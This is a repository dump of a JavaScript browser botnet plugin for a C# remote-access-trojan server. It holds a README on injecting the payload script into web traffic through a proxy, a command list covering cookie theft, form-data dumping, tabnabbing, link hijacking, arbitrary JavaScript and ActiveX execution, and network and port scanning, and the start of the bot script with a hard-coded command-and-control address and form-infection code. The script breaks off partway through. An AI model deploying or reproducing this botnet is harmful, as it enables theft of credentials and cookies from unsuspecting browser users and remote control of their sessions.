├── WebPlugin
├── bin
│ └── Debug
│ │ ├── sCore.dll
│ │ ├── WebPlugin.dll
│ │ └── c# R.A.T Browser
│ │ ├── testSite.html
│ │ └── main.js
├── Properties
│ └── AssemblyInfo.cs
├── WebPlugin.csproj
└── Class1.cs
├── LICENSE
├── WebPlugin.sln
├── CONTRIBUTING.md
├── README.md
├── .gitattributes
├── Commands.md
├── CODE_OF_CONDUCT.md
└── .gitignore
/WebPlugin/bin/Debug/sCore.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AdvancedHacker101/Javascript-Botnet-C-Sharp/HEAD/WebPlugin/bin/Debug/sCore.dll
--------------------------------------------------------------------------------
/WebPlugin/bin/Debug/WebPlugin.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/AdvancedHacker101/Javascript-Botnet-C-Sharp/HEAD/WebPlugin/bin/Debug/WebPlugin.dll
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Advanced Hacking 101 Project Licence
2 | short and simple
3 | You are free to do anything with this project, as long as you credit me and the project
4 | Links to the project are enough
5 |
--------------------------------------------------------------------------------
/WebPlugin/bin/Debug/c# R.A.T Browser/testSite.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Bad site
5 |
6 |
7 |
8 |
9 | This is a test
10 |
11 |
12 |
13 |
19 |
20 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/WebPlugin.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.26430.12
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "WebPlugin", "WebPlugin\WebPlugin.csproj", "{2B32ECDE-4912-4142-8A86-28DFBA7B6B15}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {2B32ECDE-4912-4142-8A86-28DFBA7B6B15}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {2B32ECDE-4912-4142-8A86-28DFBA7B6B15}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {2B32ECDE-4912-4142-8A86-28DFBA7B6B15}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {2B32ECDE-4912-4142-8A86-28DFBA7B6B15}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | EndGlobal
23 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contribution
2 | **Thank you for considering contribution to the Javascript Botnet C\# Project!**
3 | ## How to contribute?
4 | It's very simple!
5 | 1. Fork the project
6 | 2. Make the changes
7 | 3. Issue a pull request
8 | 4. I will do a merge after verifying (in some cases changing) the code
9 | ## How to report bugs?
10 | You can simply use the *Issues* section on github
11 | Just write an issue, and i will try to respond within 24 hours!
12 | ## How to contribute? (without writing code)
13 | You can also do this on the *Issues* section, and i will label it as *enhancement*
14 | This way you can suggest new features, or change an older one without coding.
15 | I will try to respond within 24 hours!
16 | ## How to run / compile
17 | I use Visual Studio 2017 Community Edition.
18 | The program is written in c\# and built with .NET Framework 4.5
19 | For the client side you can use any modern browser and the text editor of your choice
20 | Any additional requirements can be found under WebPlugin/bin/debug
21 | ## How to ask questions?
22 | You can also use the *Issues* section on GitHub, i will assign a label to it, so it's different from bugs.
23 | I will try to respond within 24 hours!
24 | You can also contact me at my [Youtube Channel](https://www.youtube.com/channel/UCYIOySp8zTTWJG5-n8wpZ2g)
25 | Either a comment on the video about the topic, or a message at the *Discussion* section on my channel page
26 |
--------------------------------------------------------------------------------
/WebPlugin/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("WebPlugin")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("WebPlugin")]
13 | [assembly: AssemblyCopyright("Copyright © 2017")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("2b32ecde-4912-4142-8a86-28dfba7b6b15")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Javascript Botent
2 | This is a botnet based on javascript to hack into users browsers.
3 | This project is a plug-in for the [C# R.A.T Server](https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Server) Project.
4 | Some key functions are:
5 | - TabNabbing
6 | - Form Data Dumping
7 | - Replacing and adding html content
8 |
9 | ## Installation
10 | ### Server Side
11 | 1. Put the WebPlugin.dll file from WebPlugin/bin/Debug into TutServer/bin/Debug/scripts
12 | 2. Start TutServer.exe
13 | 3. Switch to the tab "Plugins"
14 | 4. Select WebPlugin.dll from the list
15 | 5. Click Execute
16 | 6. Enter a port for the server to run on for example **80**
17 |
18 | **Note:** this is a separate socket server from the normal windows and linux client one, choose a different port from 100
19 | This is only a plugin and using it is **optional**, it won't break the c# R.A.T Server in any cases
20 |
21 | ### Client Side
22 | We have 2 options here:
23 | - Create a test website which loads WebPlugin/bin/Debug/C# R.A.T Browser/main.js (btw. testSite.html does this)
24 | - Or inject main.js into every http packet with for example the [C# Proxy Server](https://github.com/AdvancedHacker101/C-Sharp-Proxy-Server)
25 |
26 | **Note:** Don't forget to re-write the ip and port in the main.js file, it's in a variable named serverLocation at the 17th line
27 | For additional resources read:
28 | - [The Code of Conduct](https://github.com/AdvancedHacker101/Javascript-Botnet-C-Sharp/blob/master/CODE_OF_CONDUCT.md)
29 | - [How to contribute](https://github.com/AdvancedHacker101/Javascript-Botnet-C-Sharp/blob/master/CONTRIBUTING.md)
30 | - [The licence file](https://github.com/AdvancedHacker101/Javascript-Botnet-C-Sharp/blob/master/LICENSE)
31 | - [Complete list of commands](https://github.com/AdvancedHacker101/Javascript-Botnet-C-Sharp/blob/master/Commands.md)
32 |
--------------------------------------------------------------------------------
/WebPlugin/WebPlugin.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {2B32ECDE-4912-4142-8A86-28DFBA7B6B15}
8 | Library
9 | Properties
10 | WebPlugin
11 | WebPlugin
12 | v4.5.2
13 | 512
14 |
15 |
16 | true
17 | full
18 | false
19 | bin\Debug\
20 | DEBUG;TRACE
21 | prompt
22 | 4
23 |
24 |
25 | pdbonly
26 | true
27 | bin\Release\
28 | TRACE
29 | prompt
30 | 4
31 |
32 |
33 |
34 | ..\..\sCore\sCore\bin\Debug\sCore.dll
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/Commands.md:
--------------------------------------------------------------------------------
1 | # Complete list of commands for the Javascript botent
2 | `test` - Test the connection between the server and the client
3 | `alert [message]` - Display a classic alert box with the specified message
4 | `push-html [html content/local html file path]` - Replace the page with the specified content (kind of deface i guess)
5 | `append-html [html content/local html file path]` - Append html content at the end of the page
6 | `get-site` - Display the url of the current site
7 | `get-cookie` - Read cookies from the current site
8 | `form-infect` - Infect the form with a data dumping code
9 | **Note:** Results are sent when the form is submitted, then it gets saved at TutServer/formDump.txt with all field names, values and the clientID which submitted the form
10 | `get-info` - Get the screen size of the target
11 | `check-pop-up` - Check if a pop-up window can be displayed
12 | `check-activex` - Check if an ActiveX command can be executed / accepeted by the user/browser
13 | `play-audio [audio file link]` - Play's an audio file from the specified link
14 | `hijack-link [target link]` - Replace all links on the site with the specified link
15 | `prompt [message]` - Display a basic prompt with the specified message
16 | **Note:** The client will return the text the user responded with to the prompt.
17 | `redirect [target link]` - Redirect the page to the specified link
18 | `geolocate` - Try to get the users position latitude and longitude
19 | **Note:** The user will see a dialog and gets presented with yes/no if responds with yes you get the location, else you get an error permission denied.
20 | Results are sent when we got location or the user cancelled the prompt, if you switch the controlled client the result will still get displayed.
21 | `execute-js [javascript code/local javascript file]` - Execute raw javascript in the browser
22 | `ipscan [3rd octet]` - Scan the network for online IPs
23 | **Note:** The program can only work with 255.255.0.0 subnet mask meaning that you can't specify the first two octets.
24 | The last octet gets scanned from 0 to 254 and you can specify the 3rd octet
25 | `ipscan` - Scan the network for common class C Adresses
26 | **Note:** This will only try the popular 3rd octets: xxx.xxx.0, 1, 10 match is not 100% chance
27 | `port-scan [IP Address] [port Number]` - Scans a specific port for a specific IP
28 | **Note:** Some ports a blocked by the browsers in this case the bot will respond with a message like "blocked by browser" and not port closed.
29 | `prevent-close` - Prevents the closing of the tab
30 | **Note:** This doesn't really work science browsers block this kind of behavior, becauase scammers used it to keep their page open.
31 | But the user can still choose to stay on the page, so that's why i left it in.
32 | `tabnab [target link] [wait time in seconds]` - redirects the page to the specified link after a speified time of inaactivity
33 | `execute-ax [command]` - Execute a command with ActiveX only on window and IE
34 |
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Contributor Covenant Code of Conduct
2 |
3 | ## Our Pledge
4 |
5 | In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
6 |
7 | ## Our Standards
8 |
9 | Examples of behavior that contributes to creating a positive environment include:
10 |
11 | * Using welcoming and inclusive language
12 | * Being respectful of differing viewpoints and experiences
13 | * Gracefully accepting constructive criticism
14 | * Focusing on what is best for the community
15 | * Showing empathy towards other community members
16 |
17 | Examples of unacceptable behavior by participants include:
18 |
19 | * The use of sexualized language or imagery and unwelcome sexual attention or advances
20 | * Trolling, insulting/derogatory comments, and personal or political attacks
21 | * Public or private harassment
22 | * Publishing others' private information, such as a physical or electronic address, without explicit permission
23 | * Other conduct which could reasonably be considered inappropriate in a professional setting
24 |
25 | ## Our Responsibilities
26 |
27 | Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
28 |
29 | Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
30 |
31 | ## Scope
32 |
33 | This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
34 |
35 | ## Enforcement
36 |
37 | Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at ghost@mcghost.ddns.net. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
38 |
39 | Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
40 |
41 | ## Attribution
42 |
43 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
44 |
45 | [homepage]: http://contributor-covenant.org
46 | [version]: http://contributor-covenant.org/version/1/4/
47 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | #[Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | bld/
21 | #[Bb]in/
22 | [Oo]bj/
23 | [Ll]og/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | project.fragment.lock.json
46 | artifacts/
47 |
48 | *_i.c
49 | *_p.c
50 | *_i.h
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.tmp_proj
65 | *.log
66 | *.vspscc
67 | *.vssscc
68 | .builds
69 | *.pidb
70 | *.svclog
71 | *.scc
72 |
73 | # Chutzpah Test files
74 | _Chutzpah*
75 |
76 | # Visual C++ cache files
77 | ipch/
78 | *.aps
79 | *.ncb
80 | *.opendb
81 | *.opensdf
82 | *.sdf
83 | *.cachefile
84 | *.VC.db
85 | *.VC.VC.opendb
86 |
87 | # Visual Studio profiler
88 | *.psess
89 | *.vsp
90 | *.vspx
91 | *.sap
92 |
93 | # TFS 2012 Local Workspace
94 | $tf/
95 |
96 | # Guidance Automation Toolkit
97 | *.gpState
98 |
99 | # ReSharper is a .NET coding add-in
100 | _ReSharper*/
101 | *.[Rr]e[Ss]harper
102 | *.DotSettings.user
103 |
104 | # JustCode is a .NET coding add-in
105 | .JustCode
106 |
107 | # TeamCity is a build add-in
108 | _TeamCity*
109 |
110 | # DotCover is a Code Coverage Tool
111 | *.dotCover
112 |
113 | # NCrunch
114 | _NCrunch_*
115 | .*crunch*.local.xml
116 | nCrunchTemp_*
117 |
118 | # MightyMoose
119 | *.mm.*
120 | AutoTest.Net/
121 |
122 | # Web workbench (sass)
123 | .sass-cache/
124 |
125 | # Installshield output folder
126 | [Ee]xpress/
127 |
128 | # DocProject is a documentation generator add-in
129 | DocProject/buildhelp/
130 | DocProject/Help/*.HxT
131 | DocProject/Help/*.HxC
132 | DocProject/Help/*.hhc
133 | DocProject/Help/*.hhk
134 | DocProject/Help/*.hhp
135 | DocProject/Help/Html2
136 | DocProject/Help/html
137 |
138 | # Click-Once directory
139 | publish/
140 |
141 | # Publish Web Output
142 | *.[Pp]ublish.xml
143 | *.azurePubxml
144 | # TODO: Comment the next line if you want to checkin your web deploy settings
145 | # but database connection strings (with potential passwords) will be unencrypted
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
150 | # checkin your Azure Web App publish settings, but sensitive information contained
151 | # in these scripts will be unencrypted
152 | PublishScripts/
153 |
154 | # NuGet Packages
155 | *.nupkg
156 | # The packages folder can be ignored because of Package Restore
157 | **/packages/*
158 | # except build/, which is used as an MSBuild target.
159 | !**/packages/build/
160 | # Uncomment if necessary however generally it will be regenerated when needed
161 | #!**/packages/repositories.config
162 | # NuGet v3's project.json files produces more ignoreable files
163 | *.nuget.props
164 | *.nuget.targets
165 |
166 | # Microsoft Azure Build Output
167 | csx/
168 | *.build.csdef
169 |
170 | # Microsoft Azure Emulator
171 | ecf/
172 | rcf/
173 |
174 | # Windows Store app package directories and files
175 | AppPackages/
176 | BundleArtifacts/
177 | Package.StoreAssociation.xml
178 | _pkginfo.txt
179 |
180 | # Visual Studio cache files
181 | # files ending in .cache can be ignored
182 | *.[Cc]ache
183 | # but keep track of directories ending in .cache
184 | !*.[Cc]ache/
185 |
186 | # Others
187 | ClientBin/
188 | ~$*
189 | *~
190 | *.dbmdl
191 | *.dbproj.schemaview
192 | *.jfm
193 | *.pfx
194 | *.publishsettings
195 | node_modules/
196 | orleans.codegen.cs
197 |
198 | # Since there are multiple workflows, uncomment next line to ignore bower_components
199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
200 | #bower_components/
201 |
202 | # RIA/Silverlight projects
203 | Generated_Code/
204 |
205 | # Backup & report files from converting an old project file
206 | # to a newer Visual Studio version. Backup files are not needed,
207 | # because we have git ;-)
208 | _UpgradeReport_Files/
209 | Backup*/
210 | UpgradeLog*.XML
211 | UpgradeLog*.htm
212 |
213 | # SQL Server files
214 | *.mdf
215 | *.ldf
216 |
217 | # Business Intelligence projects
218 | *.rdl.data
219 | *.bim.layout
220 | *.bim_*.settings
221 |
222 | # Microsoft Fakes
223 | FakesAssemblies/
224 |
225 | # GhostDoc plugin setting file
226 | *.GhostDoc.xml
227 |
228 | # Node.js Tools for Visual Studio
229 | .ntvs_analysis.dat
230 |
231 | # Visual Studio 6 build log
232 | *.plg
233 |
234 | # Visual Studio 6 workspace options file
235 | *.opt
236 |
237 | # Visual Studio LightSwitch build output
238 | **/*.HTMLClient/GeneratedArtifacts
239 | **/*.DesktopClient/GeneratedArtifacts
240 | **/*.DesktopClient/ModelManifest.xml
241 | **/*.Server/GeneratedArtifacts
242 | **/*.Server/ModelManifest.xml
243 | _Pvt_Extensions
244 |
245 | # Paket dependency manager
246 | .paket/paket.exe
247 | paket-files/
248 |
249 | # FAKE - F# Make
250 | .fake/
251 |
252 | # JetBrains Rider
253 | .idea/
254 | *.sln.iml
255 |
256 | # CodeRush
257 | .cr/
258 |
259 | # Python Tools for Visual Studio (PTVS)
260 | __pycache__/
261 | *.pyc
--------------------------------------------------------------------------------
/WebPlugin/bin/Debug/c# R.A.T Browser/main.js:
--------------------------------------------------------------------------------
1 | //Section: Global Variables
2 |
3 | var debug_mode = 1;
4 | var clientID = "";
5 | var listening = false;
6 | var afterError = false;
7 | var intervalHost;
8 | var allFormData = "";
9 | var validIPs = "";
10 | var lastIP = "";
11 | var validSubnetFound = false;
12 | var blocked_ports = [0,1,7,9,11,13,15,17,19,20,21,22,23,25,37,42,43,53,77,79,87,95,101,102,103,104,109,110,111,113,115,117,119,123,135,139,143,179,389,465,512,513,514,515,526,530,531,532,540,556,563,587,601,636,993,995,2049,4045,6000];
13 | var actionIntervalHost;
14 | var inactiveTime = 0;
15 | var tabNabSite = "";
16 | var canTabNab = false;
17 | var serverLocation = "http://192.168.10.56:80";
18 |
19 | //Section: Helper Methods
20 |
21 | function Log(message) //Log messages
22 | {
23 | if (debug_mode == 1) console.log(message); //Only log if debug_mode is set
24 | }
25 |
26 | function CheckjQuery() //Check if jQuery exists
27 | {
28 | if (typeof jQuery == "undefined") return false; //jQuery is undefined, not existing
29 | return true; //jQuery is defined, existing
30 | }
31 |
32 | function LoadjQuery() //Load yQuery into the document
33 | {
34 | var scriptTag = document.createElement("script"); //Create HTML Script Tag
35 | scriptTag.src = "https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"; //Source is jQuery hosted on googleapis
36 | scriptTag.type = "text/javascript"; //Script type is javascript
37 | document.getElementsByTagName("head")[0].appendChild(scriptTag); //Insert the scriptag to the head section of the HTML document
38 | }
39 |
40 | var waitForjQuery = function () //Wait for jQuery to load
41 | {
42 | if (CheckjQuery) //Jquery is loaded
43 | {
44 | Log("jQuery loaded");
45 | startListener(); //Start polling
46 | }
47 | else //jQuery is not yet loaded
48 | {
49 | window.setTimeout(waitForjQuery, 1000); //Wait another 1 second
50 | }
51 | };
52 |
53 | function infectAllForms() //infect all forms on a website (on submit sends all from data to server)
54 | {
55 | var all = document.getElementsByTagName("*"); //Get every element on zhe page
56 |
57 | for (var i=0, max=all.length; i < max; i++) { //Loop through every element
58 | var element = all[i]; //The current element
59 | var element_type = '<' + element.tagName.toLowerCase() + '>'; //Element tag name
60 | Log(element_type);
61 | if (element_type == "